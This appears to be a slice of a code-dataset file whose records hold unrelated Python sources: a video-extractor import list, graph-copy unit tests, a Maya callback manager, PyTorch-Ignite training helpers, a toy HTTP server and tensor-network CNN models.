TwentyMinutenIE\nfrom .twentythreevideo import TwentyThreeVideoIE\nfrom .twitcasting import (\n TwitCastingIE,\n TwitCastingLiveIE,\n TwitCastingUserIE,\n)\nfrom .twitch import (\n TwitchVodIE,\n TwitchCollectionIE,\n TwitchVideosIE,\n TwitchVideosClipsIE,\n TwitchVideosCollectionsIE,\n TwitchStreamIE,\n TwitchClipsIE,\n)\nfrom .twitter import (\n TwitterCardIE,\n TwitterIE,\n TwitterAmplifyIE,\n TwitterBroadcastIE,\n TwitterShortenerIE,\n)\nfrom .udemy import (\n UdemyIE,\n UdemyCourseIE\n)\nfrom .udn import UDNEmbedIE\nfrom .ufctv import (\n UFCTVIE,\n UFCArabiaIE,\n)\nfrom .ukcolumn import UkColumnIE\nfrom .uktvplay import UKTVPlayIE\nfrom .digiteka import DigitekaIE\nfrom .dlive import (\n DLiveVODIE,\n DLiveStreamIE,\n)\nfrom .umg import UMGDeIE\nfrom .unistra import UnistraIE\nfrom .unity import UnityIE\nfrom .uol import UOLIE\nfrom .uplynk import (\n UplynkIE,\n UplynkPreplayIE,\n)\nfrom .urort import UrortIE\nfrom .urplay import URPlayIE\nfrom .usanetwork import USANetworkIE\nfrom .usatoday import USATodayIE\nfrom .ustream import UstreamIE, UstreamChannelIE\nfrom .ustudio import (\n UstudioIE,\n UstudioEmbedIE,\n)\nfrom .utreon import UtreonIE\nfrom .varzesh3 import Varzesh3IE\nfrom .vbox7 import Vbox7IE\nfrom .veehd import VeeHDIE\nfrom .veoh import VeohIE\nfrom .vesti import VestiIE\nfrom .vevo import (\n VevoIE,\n VevoPlaylistIE,\n)\nfrom .vgtv import (\n BTArticleIE,\n BTVestlendingenIE,\n VGTVIE,\n)\nfrom .vh1 import VH1IE\nfrom .vice import (\n ViceIE,\n ViceArticleIE,\n ViceShowIE,\n)\nfrom .vidbit import VidbitIE\nfrom .viddler import ViddlerIE\nfrom .videa import VideaIE\nfrom .videodetective import VideoDetectiveIE\nfrom .videofyme import VideofyMeIE\nfrom .videomore import (\n VideomoreIE,\n VideomoreVideoIE,\n VideomoreSeasonIE,\n)\nfrom .videopress import VideoPressIE\nfrom .vidio import (\n VidioIE,\n VidioPremierIE,\n VidioLiveIE\n)\nfrom .vidlii import VidLiiIE\nfrom .vidme import (\n VidmeIE,\n VidmeUserIE,\n VidmeUserLikesIE,\n)\nfrom .vier import VierIE, VierVideosIE\nfrom .viewlift import (\n ViewLiftIE,\n ViewLiftEmbedIE,\n)\nfrom .viidea import ViideaIE\nfrom .vimeo import (\n VimeoIE,\n VimeoAlbumIE,\n VimeoChannelIE,\n VimeoGroupsIE,\n VimeoLikesIE,\n VimeoOndemandIE,\n VimeoReviewIE,\n VimeoUserIE,\n VimeoWatchLaterIE,\n VHXEmbedIE,\n)\nfrom .vimple import VimpleIE\nfrom .vine import (\n VineIE,\n VineUserIE,\n)\nfrom .viki import (\n VikiIE,\n VikiChannelIE,\n)\nfrom .viqeo import ViqeoIE\nfrom .viu import (\n ViuIE,\n ViuPlaylistIE,\n ViuOTTIE,\n)\nfrom .vk import (\n VKIE,\n VKUserVideosIE,\n VKWallPostIE,\n)\nfrom .vlive import (\n VLiveIE,\n VLivePostIE,\n VLiveChannelIE,\n)\nfrom .vodlocker import VodlockerIE\nfrom .vodpl import VODPlIE\nfrom .vodplatform import VODPlatformIE\nfrom .voicerepublic import VoiceRepublicIE\nfrom .voicy import (\n VoicyIE,\n VoicyChannelIE,\n)\nfrom .voot import (\n VootIE,\n VootSeriesIE,\n)\nfrom .voxmedia import (\n VoxMediaVolumeIE,\n VoxMediaIE,\n)\nfrom .vrt import VRTIE\nfrom .vrak import VrakIE\nfrom .vrv import (\n VRVIE,\n VRVSeriesIE,\n)\nfrom .vshare import VShareIE\nfrom .vtm import VTMIE\nfrom .medialaan import MedialaanIE\nfrom .vube import VubeIE\nfrom .vuclip import VuClipIE\nfrom .vvvvid import (\n VVVVIDIE,\n VVVVIDShowIE,\n)\nfrom .vyborymos import VyboryMosIE\nfrom .vzaar import VzaarIE\nfrom .wakanim import WakanimIE\nfrom .walla import WallaIE\nfrom .washingtonpost import (\n WashingtonPostIE,\n WashingtonPostArticleIE,\n)\nfrom .wat import WatIE\nfrom .watchbox import WatchBoxIE\nfrom 
.watchindianporn import WatchIndianPornIE\nfrom .wdr import (\n WDRIE,\n WDRPageIE,\n WDRElefantIE,\n WDRMobileIE,\n)\nfrom .webcaster import (\n WebcasterIE,\n WebcasterFeedIE,\n)\nfrom .webofstories import (\n WebOfStoriesIE,\n WebOfStoriesPlaylistIE,\n)\nfrom .weibo import (\n WeiboIE,\n WeiboMobileIE\n)\nfrom .weiqitv import WeiqiTVIE\nfrom .wimtv import WimTVIE\nfrom .whowatch import WhoWatchIE\nfrom .wistia import (\n WistiaIE,\n WistiaPlaylistIE,\n)\nfrom .worldstarhiphop import WorldStarHipHopIE\nfrom .wsj import (\n WSJIE,\n WSJArticleIE,\n)\nfrom .wwe import WWEIE\nfrom .xbef import XBefIE\nfrom .xboxclips import XboxClipsIE\nfrom .xfileshare import XFileShareIE\nfrom .xhamster import (\n XHamsterIE,\n XHamsterEmbedIE,\n XHamsterUserIE,\n)\nfrom .xiami import (\n XiamiSongIE,\n XiamiAlbumIE,\n XiamiArtistIE,\n XiamiCollectionIE\n)\nfrom .ximalaya import (\n XimalayaIE,\n XimalayaAlbumIE\n)\nfrom .xminus import XMinusIE\nfrom .xnxx import XNXXIE\nfrom .xstream import XstreamIE\nfrom .xtube import XTubeUserIE, XTubeIE\nfrom .xuite import XuiteIE\nfrom .xvideos import XVideosIE\nfrom .xxxymovies import XXXYMoviesIE\nfrom .yahoo import (\n YahooIE,\n YahooSearchIE,\n YahooGyaOPlayerIE,\n YahooGyaOIE,\n YahooJapanNewsIE,\n)\nfrom .yandexdisk import YandexDiskIE\nfrom .yandexmusic import (\n YandexMusicTrackIE,\n YandexMusicAlbumIE,\n YandexMusicPlaylistIE,\n YandexMusicArtistTracksIE,\n YandexMusicArtistAlbumsIE,\n)\nfrom .yandexvideo import YandexVideoIE\nfrom .yapfiles import YapFilesIE\nfrom .yesjapan import YesJapanIE\nfrom .yinyuetai import YinYueTaiIE\nfrom .ynet import YnetIE\nfrom .youjizz import YouJizzIE\nfrom .youku import (\n YoukuIE,\n YoukuShowIE,\n)\nfrom .younow import (\n YouNowLiveIE,\n YouNowChannelIE,\n YouNowMomentIE,\n)\nfrom .youporn import YouPornIE\nfrom .yourporn import YourPornIE\nfrom .yourupload import YourUploadIE\nfrom .youtube import (\n YoutubeIE,\n YoutubeFavouritesIE,\n YoutubeHistoryIE,\n YoutubeTabIE,\n YoutubePlaylistIE,\n YoutubeRecommendedIE,\n YoutubeSearchDateIE,\n YoutubeSearchIE,\n YoutubeSearchURLIE,\n YoutubeSubscriptionsIE,\n YoutubeTruncatedIDIE,\n YoutubeTruncatedURLIE,\n YoutubeYtBeIE,\n YoutubeYtUserIE,\n YoutubeWatchLaterIE,\n)\nfrom .zapiks import ZapiksIE\nfrom .zattoo import (\n BBVTVIE,\n EinsUndEinsTVIE,\n EWETVIE,\n GlattvisionTVIE,\n MNetTVIE,\n MyVisionTVIE,\n NetPlusIE,\n OsnatelTVIE,\n QuantumTVIE,\n QuicklineIE,\n QuicklineLiveIE,\n SaltTVIE,\n SAKTVIE,\n VTXTVIE,\n WalyTVIE,\n ZattooIE,\n ZattooLiveIE,\n)\nfrom .zdf import ZDFIE, ZDFChannelIE\nfrom .zee5 import (\n Zee5IE,\n Zee5SeriesIE,\n)\nfrom .zhihu import ZhihuIE\nfrom .zingmp3 import (\n ZingMp3IE,\n ZingMp3AlbumIE,\n)\nfrom .zoom import ZoomIE\nfrom .zype import ZypeIE\n"} {"ext": "py", "sha": "1a309402d864a31e994ffddb348a018bcad1fd82", "content": "from dagstermill.examples.repository import notebook_repo\n\nfrom dagster import RepositoryDefinition\n\n\ndef test_dagstermill_repo():\n assert isinstance(notebook_repo, RepositoryDefinition)\n"} {"ext": "py", "sha": "1a30941ed183698b3a0aea20efec96af8d46f379", "content": "# -*- coding: utf-8 -*-\n\n\"\"\"\nfile: module_graph_copy_test.py\n\nUnit tests for Graph copy related methods\n\"\"\"\n\nimport copy\n\nfrom unittest_baseclass import UnittestPythonCompatibility\n\nfrom graphit import Graph\n\n\nclass TestGraphCopy(UnittestPythonCompatibility):\n \"\"\"\n Test Graph copy and deepcopy methods\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Build default graph with nodes, edges and attributes\n \"\"\"\n\n self.graph = 
Graph()\n self.graph.add_nodes([('g', {'weight': 1.0}), ('r', {'weight': 1.5}), ('a', {'weight': 2.0}),\n ('p', {'weight': 2.5}), ('h', {'weight': 3.0})])\n self.graph.add_edges([(1, 2), (2, 3), (3, 4), (3, 5), (4, 5)], isedge=True)\n\n def tearDown(self):\n \"\"\"\n Test copied state\n Testing equality in node, edge and adjacency data stores is based on\n the internal '_storage' object and not so much the storage object\n itself which is often just a wrapper.\n \"\"\"\n\n # Main Graph object is new\n self.assertTrue(id(self.copied) != id(self.graph))\n\n if self.shallow:\n\n # Internal node and edge stores point to parent.\n self.assertEqual(id(self.copied.nodes._storage), id(self.graph.nodes._storage))\n self.assertEqual(id(self.copied.edges._storage), id(self.graph.edges._storage))\n\n # ORM and origin objects point to parent\n self.assertEqual(id(self.copied.orm), id(self.graph.orm))\n self.assertEqual(id(self.copied.origin), id(self.graph.origin))\n\n else:\n\n # Internal node and edge stores point to parent.\n self.assertNotEqual(id(self.copied.nodes._storage), id(self.graph.nodes._storage))\n self.assertNotEqual(id(self.copied.edges._storage), id(self.graph.edges._storage))\n\n # ORM and origin objects point to parent\n self.assertNotEqual(id(self.copied.orm), id(self.graph.orm))\n self.assertNotEqual(id(self.copied.origin), id(self.graph.origin))\n\n def test_graph_copy_shallow(self):\n \"\"\"\n Test making a shallow copy of a graph. This essentially copies the\n Graph object while linking tot the data store in the parent Graph\n \"\"\"\n\n self.shallow = True\n self.copied = self.graph.copy(deep=False)\n\n def test_graph_copy_deep(self):\n \"\"\"\n Test making a deep copy of a graph (default) copying everything\n \"\"\"\n\n self.shallow = False\n self.copied = self.graph.copy()\n\n def test_graph_buildin_copy_shallow(self):\n \"\"\"\n Test making a shallow copy of a graph using the 'copy' method of the\n copy class. This calls the Graph.copy method\n \"\"\"\n\n self.shallow = True\n self.copied = copy.copy(self.graph)\n\n def test_graph_buildin_copy_deep(self):\n \"\"\"\n Test making a deep copy of a graph using the 'deepcopy' method of the\n copy class. 
This calls the Graph.copy method\n \"\"\"\n\n self.shallow = False\n self.copied = copy.deepcopy(self.graph)\n\n def test_graph_buildin_copy_deep_view(self):\n \"\"\"\n Test copying subgraphs either with the set 'view' only or the full\n origin graph (full graph)\n \"\"\"\n\n # Regular copy\n self.shallow = False\n self.copied = copy.deepcopy(self.graph)\n\n # Build subgraph, same origin\n view = self.graph.getnodes([3,4,5])\n self.assertEqual(id(view.origin), id(self.graph.origin))\n\n # Deep copy with or without view, different origin\n copy_view = view.copy(deep=True, copy_view=False)\n copy_full = view.copy(deep=True, copy_view=True)\n self.assertNotEqual(id(copy_view.origin), id(self.graph.origin))\n self.assertNotEqual(id(copy_full.origin), id(self.graph.origin))\n\n # Subgraph 'view' should be identical to the original\n # regardless the copy mode\n self.assertEqual(copy_view.nodes.keys(), view.nodes.keys())\n self.assertEqual(copy_view.edges.keys(), view.edges.keys())\n self.assertEqual(copy_view.adjacency.keys(), view.adjacency.keys())\n self.assertEqual(copy_full.nodes.keys(), view.nodes.keys())\n self.assertEqual(copy_full.edges.keys(), view.edges.keys())\n self.assertEqual(copy_full.adjacency.keys(), view.adjacency.keys())\n\n # The view copy origin should either be identical to the view\n # (copy_view = True) or to the full graph (copy_view = False)\n self.assertEqual(list(copy_view.nodes._storage.keys()), list(view.nodes.keys()))\n self.assertEqual(list(copy_full.nodes._storage.keys()), list(view.origin.nodes.keys()))\n\n # The copy_full has its origin equals self and thus copy_full.origin.nodes\n # equals copy_full.nodes. However, the view is also set which means that\n # by default the full graph is not accessible without resetting it\n copy_full.nodes.reset_view()\n self.assertEqual(copy_full.nodes.keys(), self.graph.nodes.keys())\n"} {"ext": "py", "sha": "1a3094508c7ffe16aced913876d5f4737a3bc88b", "content": "\"\"\"\n## SCRIPT HEADER ##\n\nCreated By : Muhammad Fredo\nEmail : muhammadfredo@gmail.com\nStart Date : 03 Nov 2020\nInfo :\n\nalternative_callback_data: header data\n \"id\": (callback id)\n \"event_name\": \"after_open\"\n \"callback_tag\": fr_maya\n\nmaya_event_callbacks:\n after_open:\n event_id: event_id,\n add_callback: om callback function\n before_open:\n event_id: event_id,\n add_callback: om callback function\n\"\"\"\nimport copy\nimport inspect\nimport re\n\nimport maya.OpenMaya as om\n# TODO: update to api 2.0 ??\n\nfrom FrMaya import utility as util\n\n\nclass MyCallbackManager(object):\n __metaclass__ = util.MetaSingleton\n\n @staticmethod\n def get_maya_event_callback():\n \"\"\"\n Return dictionary data of Maya events callback.\n\n after_open:\n event_id: event_id,\n\n add_callback: open Maya callback function.\n before_open:\n event_id: event_id,\n\n add_callback: open Maya callback function.\n :rtype: dict\n \"\"\"\n # example regex subs -> re.sub(r\"(\\w)([A-Z])\", r\"\\1 \\2\", \"WordWordWord\")\n callback_events = {}\n re_pattern = re.compile(r'(?<=\\w)([A-Z])')\n for event_name, event_id in inspect.getmembers(om.MSceneMessage):\n if event_name.startswith('k') and not event_name.endswith('check'):\n if not callback_events.get(event_name):\n key_name = re_pattern.sub(r'_\\1', event_name[1:])\n callback_events[key_name.lower()] = {\n 'event_id': event_id,\n 'add_callback': om.MSceneMessage.addCallback,\n }\n\n return callback_events\n\n def __init__(self):\n \"\"\"Class to manage callback for FrMaya system.\"\"\"\n print 'initialize callback 
manager'\n self._maya_event_callback = {}\n self._registered_callback = {}\n\n self._maya_event_callback = copy.deepcopy(self.get_maya_event_callback())\n\n assert len(self._maya_event_callback) > 0, ''\n\n def _group_registered_callbacks(self):\n \"\"\"\n Return registered callbacks based on events or tags callback.\n\n events:\n event_name: [callback function name, ..],\n\n tags:\n callback_tag: [callback function name, ..],\n\n :rtype: dict\n \"\"\"\n result_data = {'events': {}, 'tags': {}}\n for cb_fn_name, cb_data in self._registered_callback.items():\n for each in result_data:\n if each == 'events':\n event_or_tag = cb_data['event_name']\n elif each == 'tags':\n event_or_tag = cb_data['callback_tag']\n else:\n return None\n\n if result_data[each].get(event_or_tag):\n result_data[each][event_or_tag].append(cb_fn_name)\n else:\n result_data[each][event_or_tag] = [cb_fn_name]\n return result_data\n\n def add_callback(self, event_name, callback_tag, func):\n \"\"\"\n Return True if it success add callback to callback manager, False otherwise.\n\n :arg event_name: Maya event nice name.\n :type event_name: str\n :arg callback_tag: A tag to group callback in callback manager.\n :type callback_tag: str\n :arg func: Python function.\n :rtype: bool\n \"\"\"\n my_event_cb = self._maya_event_callback.get(event_name)\n\n if my_event_cb:\n callback_id = my_event_cb['add_callback'](my_event_cb['event_id'], func)\n\n self._registered_callback[func.__module__] = {\n 'event_name': event_name,\n 'callback_tag': callback_tag,\n 'callback_id': callback_id\n }\n\n return True\n else:\n return False\n\n def remove_callback(self, event_name = '', callback_tag = ''):\n \"\"\"\n Remove callback based on specified keyword argument.\n If both keyword specified, it will performed both action.\n\n :key event_name: Maya event name callback which want to removed.\n :type event_name: str\n :key callback_tag: Callback tag which want to removed.\n :type callback_tag: str\n \"\"\"\n callback_collection = self._group_registered_callbacks()\n\n cb_id_array = om.MCallbackIdArray()\n cb_fn_name_list = []\n if event_name:\n cb_fn_name_list.extend(callback_collection['events'].get(event_name, []))\n if callback_tag:\n cb_fn_name_list.extend(callback_collection['tags'].get(callback_tag, []))\n\n for cb_fn_name in cb_fn_name_list:\n cb_id_array.append(self._registered_callback[cb_fn_name]['callback_id'])\n\n if cb_id_array:\n om.MMessage.removeCallbacks(cb_id_array)\n\n def show_registered_callback(self, event_name = '', callback_tag = ''):\n \"\"\"\n Return registered callback based on specified keyword,\n if both keyword did not specified, it will return both group data (event name and tag).\n\n :key event_name: Maya event name callback which callback group want to retrieved.\n :type event_name: str\n :key callback_tag: Callback tag which callback group want to retrieved.\n :type callback_tag: str\n :rtype: dict or list\n \"\"\"\n result = self._group_registered_callbacks()\n\n if event_name:\n return result['events'].get(event_name, [])\n elif callback_tag:\n return result['tags'].get(callback_tag, [])\n else:\n return copy.deepcopy(result)\n\n def show_maya_event_name(self):\n \"\"\"\n Return list of Maya event nice name.\n\n :rtype: list of str\n \"\"\"\n return self._maya_event_callback.keys()\n\n\n"} {"ext": "py", "sha": "1a3094c7e76a67f7b55294278aceb4240f2068ed", "content": "from typing import Sequence, Union, Optional, Callable, Dict, Any, Tuple\nimport torch\n\nfrom ignite.engine.engine import Engine\nfrom 
ignite.engine.events import State, Events, EventEnum, CallableEventWithFilter\nfrom ignite.utils import convert_tensor\nfrom ignite.metrics import Metric\n\n__all__ = [\n \"State\",\n \"create_supervised_trainer\",\n \"create_supervised_evaluator\",\n \"Engine\",\n \"Events\",\n \"EventEnum\",\n \"CallableEventWithFilter\",\n]\n\n\ndef _prepare_batch(\n batch: Sequence[torch.Tensor], device: Optional[Union[str, torch.device]] = None, non_blocking: bool = False\n):\n \"\"\"Prepare batch for training: pass to a device with options.\n\n \"\"\"\n x, y = batch\n return (\n convert_tensor(x, device=device, non_blocking=non_blocking),\n convert_tensor(y, device=device, non_blocking=non_blocking),\n )\n\n\ndef create_supervised_trainer(\n model: torch.nn.Module,\n optimizer: torch.optim.Optimizer,\n loss_fn: Union[Callable, torch.nn.Module],\n device: Optional[Union[str, torch.device]] = None,\n non_blocking: bool = False,\n prepare_batch: Callable = _prepare_batch,\n output_transform: Callable = lambda x, y, y_pred, loss: loss.item(),\n) -> Engine:\n \"\"\"\n Factory function for creating a trainer for supervised models.\n\n Args:\n model (`torch.nn.Module`): the model to train.\n optimizer (`torch.optim.Optimizer`): the optimizer to use.\n loss_fn (torch.nn loss function): the loss function to use.\n device (str, optional): device type specification (default: None).\n Applies to batches after starting the engine. Model *will not* be moved.\n Device can be CPU, GPU or TPU.\n non_blocking (bool, optional): if True and this copy is between CPU and GPU, the copy may occur asynchronously\n with respect to the host. For other cases, this argument has no effect.\n prepare_batch (callable, optional): function that receives `batch`, `device`, `non_blocking` and outputs\n tuple of tensors `(batch_x, batch_y)`.\n output_transform (callable, optional): function that receives 'x', 'y', 'y_pred', 'loss' and returns value\n to be assigned to engine's state.output after each iteration. Default is returning `loss.item()`.\n\n Note:\n `engine.state.output` for this engine is defind by `output_transform` parameter and is the loss\n of the processed batch by default.\n\n .. 
warning::\n\n The internal use of `device` has changed.\n `device` will now *only* be used to move the input data to the correct device.\n The `model` should be moved by the user before creating an optimizer.\n\n For more information see:\n\n * `PyTorch Documentation `_\n * `PyTorch's Explanation `_\n\n Returns:\n Engine: a trainer engine with supervised update function.\n \"\"\"\n\n device_type = device.type if isinstance(device, torch.device) else device\n on_tpu = \"xla\" in device_type if device_type is not None else False\n\n if on_tpu:\n try:\n import torch_xla.core.xla_model as xm\n except ImportError:\n raise RuntimeError(\"In order to run on TPU, please install PyTorch XLA\")\n\n def _update(engine: Engine, batch: Sequence[torch.Tensor]) -> Union[Any, Tuple[torch.Tensor]]:\n model.train()\n optimizer.zero_grad()\n x, y = prepare_batch(batch, device=device, non_blocking=non_blocking)\n y_pred = model(x)\n loss = loss_fn(y_pred, y)\n loss.backward()\n\n if on_tpu:\n xm.optimizer_step(optimizer, barrier=True)\n else:\n optimizer.step()\n\n return output_transform(x, y, y_pred, loss)\n\n trainer = Engine(_update)\n\n return trainer\n\n\ndef create_supervised_evaluator(\n model: torch.nn.Module,\n metrics: Optional[Dict[str, Metric]] = None,\n device: Optional[Union[str, torch.device]] = None,\n non_blocking: bool = False,\n prepare_batch: Callable = _prepare_batch,\n output_transform: Callable = lambda x, y, y_pred: (y_pred, y),\n) -> Engine:\n \"\"\"\n Factory function for creating an evaluator for supervised models.\n\n Args:\n model (`torch.nn.Module`): the model to train.\n metrics (dict of str - :class:`~ignite.metrics.Metric`): a map of metric names to Metrics.\n device (str, optional): device type specification (default: None).\n Applies to batches after starting the engine. Model *will not* be moved.\n non_blocking (bool, optional): if True and this copy is between CPU and GPU, the copy may occur asynchronously\n with respect to the host. For other cases, this argument has no effect.\n prepare_batch (callable, optional): function that receives `batch`, `device`, `non_blocking` and outputs\n tuple of tensors `(batch_x, batch_y)`.\n output_transform (callable, optional): function that receives 'x', 'y', 'y_pred' and returns value\n to be assigned to engine's state.output after each iteration. Default is returning `(y_pred, y,)` which fits\n output expected by metrics. If you change it you should use `output_transform` in metrics.\n\n Note:\n `engine.state.output` for this engine is defind by `output_transform` parameter and is\n a tuple of `(batch_pred, batch_y)` by default.\n\n .. 
warning::\n\n The internal use of `device` has changed.\n `device` will now *only* be used to move the input data to the correct device.\n The `model` should be moved by the user before creating an optimizer.\n\n For more information see:\n\n * `PyTorch Documentation `_\n * `PyTorch's Explanation `_\n\n Returns:\n Engine: an evaluator engine with supervised inference function.\n \"\"\"\n metrics = metrics or {}\n\n def _inference(engine: Engine, batch: Sequence[torch.Tensor]) -> Union[Any, Tuple[torch.Tensor]]:\n model.eval()\n with torch.no_grad():\n x, y = prepare_batch(batch, device=device, non_blocking=non_blocking)\n y_pred = model(x)\n return output_transform(x, y, y_pred)\n\n evaluator = Engine(_inference)\n\n for name, metric in metrics.items():\n metric.attach(evaluator, name)\n\n return evaluator\n"} {"ext": "py", "sha": "1a309559cbdfd179310e5f0728e67d6420555e8b", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom cleave import server\n\n\nclass MyServer(server.BaseServer):\n \"\"\"\n My HTTP Server\n \"\"\"\n def client_handler(self, client):\n \"\"\"\n Handles a client connection\n :param client: server.BaseClient \n :return: None\n \"\"\"\n client.send('HTTP/1.1 200 OK\\n')\n client.send('Content-Type: text/html; charset=utf-8\\n\\n')\n\n client.send('
Hello world')\n\n client.send('My Address:')\n client.send('{}:{}'.format(client.addr[0], client.addr[1]))\n\n client.send('Request body:')\n client.send('{}'.format(client.message))\n \n client.send('
    By Cleave Server 0.13 Beta')\n\n\nif __name__ == '__main__':\n MyServer(port=80)"} {"ext": "py", "sha": "1a309735db48975894985b294fbedb43dcf9005c", "content": "from torch import nn\r\nimport torch as tc\r\nimport numpy as np\r\nimport BasicFun as bf\r\nimport time\r\nimport os\r\nimport sys\r\nfrom termcolor import cprint\r\nimport matplotlib\r\nfrom matplotlib.pyplot import plot, savefig, figure\r\nfrom TensorNetworkExpasion import TTN_basic, Vectorization, TTN_Pool_2by2to1, \\\r\n num_correct, load_tensor_network, save_tensor_network,\\\r\n test_accuracy_mnist, pre_process_dataset, Attention_FC, Attention_Con2d, \\\r\n TTN_Pool_2xto1, TTN_Pool_2yto1, TTN_ConvTI_2by2to1, TTN_PoolTI_2by2to1\r\n\r\n# matplotlib.use('Agg')\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg1():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg1'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg1_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg1_BP, self).__init__(num_layers=6)\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.att = Attention_FC(64*4, 16, para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.005\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = self.att(x.reshape(num, -1))\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4, 5]:\r\n x = mask_x(x, eps_mask, train)\r\n # 
print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg2():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg2'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg2_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg2_BP, self).__init__(num_layers=6)\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.005\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4, 5]:\r\n x = mask_x(x, eps_mask, train)\r\n # 